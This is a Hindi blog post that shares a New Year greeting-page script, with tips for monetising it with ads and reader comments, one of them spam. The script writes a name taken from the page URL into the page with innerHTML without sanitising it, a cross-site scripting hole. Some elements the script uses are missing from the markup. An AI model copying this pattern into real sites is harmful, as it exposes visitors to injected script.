<div class="font-effect-neon"><p class="fromMessage" id="wb-fromMessage"></p></div><br/>
<center>
<img src="https://1.bp.blogspot.com/-r3htS_Qm5lE/Xeyj9Gh6FPI/AAAAAAAABqE/GSewOO7WbikW5Ku9Pfmk19f6SPKrXbJLQCNcBGAsYHQ/s1600/happy-new-year-gif-free.gif" width="90%"/><br><br>
<img src="https://1.bp.blogspot.com/-DzyxaLN8u-Q/XeyjAuT4B-I/AAAAAAAABpk/umXUNVTctSs1n5PKAJE3AvoCnHXuFtDpACNcBGAsYHQ/s1600/2020-happy-new-year-gradient-colors-animation.gif"width="90%"
/>
<br><br>
<audio controls src="http://download1593.mediafire.com/yja0fex2m98g/mxbeluovrbr2hjf/crackers.mp3" loop></audio><br />
</center>
</br>
<span style="background-color: green; color: white; font-family: "tahoma" , "arial" , "helvetica" , sans-serif; font-size: 18pt;"> 🌠अपनेे दोस्तों के साथ शेयर करो 🌠 </span></div>
</br>
<center>
<img height="70px" src="https://4.bp.blogspot.com/-_ZpU-nyCpMc/WyNC8YxwrfI/AAAAAAAAAaw/KXfG3ltVcsgu57_M4_Fa7dZEaRVu1EyGACLcBGAs/s1600/c.gif" width="110px" />
<br /><br /><br />
<div id="formBox" >
<input type="text" name="name" id="nameTextBox" placeholder="Enter your Name">
<div id="goButton" onclick="createGreeting()" >
Go
</div>
</div>
<a class="footerbtn" href="javascript:void(0)" onclick="shareActionWA()">
<img width="25px" height="25px" src="">
<b style="font-size: 15px;position: relative;top: -3px;margin: 0 10px;">Share with your Friends</b>
<img width="25px" height="25px" src="">
</a>
</div>
</body>
.
. <script>
var jqs = function(sParam) {
var sPageURL = window.location.search.substring(1);
var sURLVariables = sPageURL.split("&");
for (var i = 0; i < sURLVariables.length; i++) {
var sParameterName = sURLVariables[i].split("=");
if (sParameterName[0] === sParam) {
return sParameterName[1];
}
}
};
window.jqs = jqs;
var name = decodeURI(jqs("bl"));
if (typeof jqs("bl") === "undefined") {
name = "";
}
var checkName = function() {
if (name.length !== 0) {
name = name.replace(/-/g, " ");
console.log("name is there", name);
document.querySelector("#wb-show-name").innerHTML = name;
document.querySelector("#wb-show-wishing").innerHTML = "की ओर से";
document.querySelector("#wb-fromMessage").innerHTML= ""
} else {
}
};
checkName();
var createGreeting=function(){
sname=document.querySelector("#nameTextBox").value;
sname=sname.replace(/@/g,"-")
sname=sname.replace(/%40/g,"-")
sname=sname.replace(/\./g,"-")
if(sname.trim()!=""){
document.querySelector("#formBox").style.display = "none";
document.querySelector(".footerbtn").style.display = "block";
document.querySelector("#wb-show-name").innerHTML = sname;
document.querySelector("#wb-show-wishing").innerHTML = "की ओर से";
document.querySelector("#wb-fromMessage").innerHTML= "Share with your Friends & Family";
window.scrollTo(0,0);
}else {
alert ("Please Type Your Name First");
document.getElementById("nameTextBox").focus();
}
}
var shareActionWA = function() {
var shareString = "";
var whatsappHref;
shareString += "*"+sname+"*";
shareString +=" ने आपके लिए कुछ खास 🎁भेजा है%0A*नीचे दी गई ब्लू लाइन को क्लिक करें*🙏%0A👇👇👇👇 %0A"
shareString +=(window.location.href.split("?")[0] + "?bl=" + sname).replace("#", "").replace(/ /g, "-");
whatsappHref = "whatsapp://send?text=" + shareString;
window.location.href = whatsappHref;
};
var countDownDate = new Date("January 1, 2023 00:00:00").getTime();
// Update the count down every 1 second
var x = setInterval(function() {
// Get todays date and time
var now = new Date().getTime();
// Find the distance between now an the count down date
var distance = countDownDate - now;
// Time calculations for days, hours, minutes and seconds
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);
// Output the result in an element with id="demo"
document.getElementById("demoo").innerHTML = days + "days " + hours + "hr "+ minutes + "min " + seconds + "sec ";
// If the count down is over, write some text
if (distance < 0)
{
clearInterval(x);
document.getElementById("demoo").innerHTML = "";
document.getElementById("inAdvance").innerHTML = "";
}
}, 1000);
</script>
</html>
आप इस Wishing Script को अपनी तरह से भी Customize कर सकते हैं। Script को अपलोड करने से पहले आपको इसमें कुछ Change कर देने है।
ये जो Wish Script है इसको आप WordPress या Coustom वेब्सायट पर भी इस्तमाल कर सकते है इसके साथ इस्स Wish Script for Blogger भी इस्तमाल कर सकते है।
Edit करने के लिए आप किसी भी Notepad का उसे कर सकते है या फिर आप direct Live Preview के साथ यह भी edit कर सकते है।
- Analytics Code: अगर आप अपनी Wishing Website को Google Analytics से जोड़ना चाहते हैं तो आपको Analytics Code text के स्थान पर अपने Code से Replace कर देना है।
- अगर आप इसमें Ads लगाना चाहते हैं तो आपको इसमें Ads लगाने के लिए भी option दिया गया है।
Script को उसे करके आप बड़ी आसानी से Wish Website बना सकते है, ओर अगर आपकी वेब्सायट वाइरल होगई तो आप ऐड्ज़ लगा कर एक खासे पैसे भी कमा सकते है।
Script को उसे करने में कही कोई भी परेसानी आए तो आप कॉमेंट करके पूछ सकते है।
इसी के साथ आपको Happy New Year ।।
good work thanks for information
badiya likha hai sir aapne thanks
Very Use Full Article
Great Job, vary well post..
Thanks vishal ji
Keep Visiting
bahut hi useful jankari hai
Thanks akash bhatt ji
Bahot hi achhi new year ki script prastut ki hai bahut achha laga…Ye script mere share karuga wo aisi hi script chahti thi…
Hello Sir,
Pichle 2 saal se blog ke bare me suna tha aur aapke articles read kiye. but blog me aane ka koi interest na tha, aftertime maine November 2019 ko blog create kiya blogger pe, traffic na hone par maine socha wordpress me shift ho jau shayad koi result mile.
so mai wordpress me shift hua. maine 14th article likhe hai abhi tak. i know seo hona bahut jaruri hai, so maine apni taraf se SEO ka pura khyal rakha hai. but koi result nhi.
traffic ke naam par zero. fb me share karne par bhale hi kuch views aa jaye but organic traffic nahi aya. search console me only 32 clicks hai kewal.
Search console me koi error nahi hai. sitemap submit hai. but Google me agar mai apni website ka naam search karta hu – Shubh World (Ise spam na samjhiyega) to google me kahi bhi show nhi hoti hai jabtak ki shubhworld.com na laga du, tab tak website show nhi hoti hai.
I know aap bahut busy honge but ek hi request hai kya aap meri site ko check karke bata sakte hai ki maine kya galti ki hai.
aapke reply ka intejar rahega.
Bahut Badhiya Jaankari Bhai Thanks For Shearing
Sir ham wishing website se kitne income Kar sakte hai
We have best offer for dishtv lovers just check our website for offer details
kya yah script wordpress par kaam karega
nice information sir .
Nice Post
hello sir can we get addsense approval in viral scripts, is it possible sir.
Thank You